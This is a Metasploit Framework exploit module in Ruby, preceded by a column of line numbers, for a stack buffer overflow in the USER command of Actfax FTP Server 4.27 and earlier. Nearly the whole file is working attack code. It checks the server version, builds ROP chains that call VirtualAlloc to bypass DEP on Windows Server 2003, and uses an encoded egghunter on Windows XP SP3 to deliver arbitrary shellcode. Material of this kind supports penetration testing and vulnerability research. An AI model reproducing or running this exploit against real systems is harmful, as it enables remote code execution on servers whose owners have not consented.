1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183 | ##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Ftp
include Msf::Exploit::Remote::Egghunter
def initialize(info = {})
super(update_info(info,
'Name' => 'Actfax FTP Server <= v4.27 USER Command Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow in actfax ftp Server
version 4.27 and earlier. Actfax fails to check input size when parsing 'USER' command.
This vulnerability results in arbitray code execution. This module has been designed to
bypass DEP under Windows Server 2003 SP2/R2.
},
'Author' =>
[
'mr_me - twitter.com/net__ninja & mrme.mythsec<at>gmail.com', # found/wrote msf module
'chap0 - chap0.mythsec<at>gmail.com', # for the original versions
],
'License' => MSF_LICENSE,
'Version' => '$Revision: 12540 $',
'References' =>
[
[ 'OSVDB', '72520' ],
[ 'URL', 'http://www.exploit-db.com/exploits/16177/' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread'
},
'Privileged' => false,
'Payload' =>
{
'Space' => 600,
'DisableNops' => true,
'EncoderType' => Msf::Encoder::Type::AlphanumMixed,
},
'Platform' => 'win',
'Targets' =>
[
# Server 2003 DEP bypass targets (fully tested)
[ 'Windows Server 2003 + DEP bypass - NTDLL v5.2.3790.4789', { 'Ret' => 0x7C813C8F } ], # MOV ESP,EBP; POP EBP; RETN [ntdll.dll]
[ 'Windows Server 2003 + DEP bypass - NTDLL v5.2.3790.3959', { 'Ret' => 0x7C813DE7 } ], # MOV ESP,EBP; POP EBP; RETN [ntdll.dll]
# NON DEP Bypass target (fully tested)
[ 'Windows XP SP3 - Universal', { 'Ret' => 0x004021C5 } ], # CALL EDI [ActSrvNT.exe]
],
'DisclosureDate' => 'Jul 31 2011',
'DefaultTarget' => 0))
end
def check
connect
disconnect
if (banner =~ /Version 4.27/ || banner =~ /Version 4.25/)
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def get_encoded_payload(p, reg)
encoder = framework.encoders.create("x86/alpha_mixed")
encoder.datastore.import_options_from_hash( {'BufferRegister'=>reg} )
rencoded_payload = encoder.encode(p, nil, nil, platform)
return rencoded_payload
end
def junk
return rand_text_alpha(4).unpack("L")[0].to_i
end
def exploit
connect
if (target.name =~ /Server 2003/)
sc = get_encoded_payload(payload.encoded, "ESP")
# specially aligned RETN
rop_stage1 = "\x42\x28\x5f" # RETN [htnetcfg.dll]
rop_stage1 += [0x5f282336].pack("V*") * 51 # RETN [htnetcfg.dll]
# All rop stage 1 instructions are from htnetcfg.dll
# Tested versions 5.2.3790.3959 &
# which seem to be universal across all windows server 2003 SP's
rop_stage1 +=
[
0x5F29C7F8, # POP EAX; POP ESI; POP EBP; RETN 8
0x5F2B5DC3, # ptr to 0x00001000
junk, # JUNK
0x5f29aa95, # p2p that is writable, we also -0c to accommodate
0x5F2A32DA, # MOV EDX,DWORD PTR DS:[EAX]; JUNK; JUNK; JUNK; JUNK; JUNK; JUNK; RETN 8
junk, # JUNK
junk, # JUNK
junk, # JUNK
0x5f282336, # RETN
junk, # JUNK
junk, # JUNK
].pack("V*")
# jump over the below stack alignment (Dont POP EDI)
rop_stage1 += [0x5F2A345D].pack("V*") # POP ECX; POP EBP; RETN [htnetcfg.dll]
# rop_stage1 + stack_alignment to realign after retn address
rop_stage1 += rand_text_alpha(1)
stack_alignment = rand_text_alpha(3)
# We have to be smart on how we use gadgets.
# Almost a universal dep bypass as most ptrs are from "ActSrvNT.exe".
# We can use null bytes 0x00 due to character conversion of 0x20!
# Also, we waste ~208 bytes in payload space but thanks to nulls, we are saved!
# EDX already contains = 1000 from flAllocationType (rop_stage1)
rop_stage2 =
[
0x204C2135, # POP EAX; RETN
0x2051E1B0, # IAT -> VirtualAlloc
0x2051D7A1, # MOV EAX,DWORD PTR DS:[EAX]; RETN
0x2040A4A0, # POP EBX; RETN
0x2040A4A0, # POP EBX; RETN
0x20422E7D, # MOV ESI,EAX; CALL EBX
0x2040F2c2, # POP EBP; POP EBX; RETN
0x204A5DED, # JMP ESP
0x20202120, # dwSize
0x204C2135, # POP EAX; RETN
0x44444444, # INC ESP before sc (getPC)
0x20415D7A, # POP EDI; POP ECX; RETN
0x20404A3F, # RETN
0x20202040, # flProtect
0x2045AB53, # PUSHAD; RETN
].pack("V*")
print_status("Targeting %s" % target.name)
sploit = rop_stage1
sploit << [target.ret].pack("V")
sploit << stack_alignment
sploit << rop_stage2
sploit << sc
sploit << rand_text_alpha((990-sploit.length))
else
eggoptions =
{
:checksum => false,
:eggtag => 'lulz',
}
# double encoded msf shellcode trick
sc = get_encoded_payload(payload.encoded, "EDI")
hunter,egg = generate_egghunter(sc, nil, eggoptions)
# encode our hunter
hunter = get_encoded_payload(hunter, "EDI")
print_status("Targeting %s" % target.name)
print_status("Sending stage 1 exploit buffer...")
send_cmd(['USER', 'anonymous'], true)
send_cmd(['PASS', egg], false)
sploit = hunter
sploit << rand_text_alpha(256-sploit.length)
sploit << [target.ret].pack("V")
# connect again ;)
connect
end
# profit
send_cmd(['USER', sploit] , false)
handler
disconnect
end
end
|
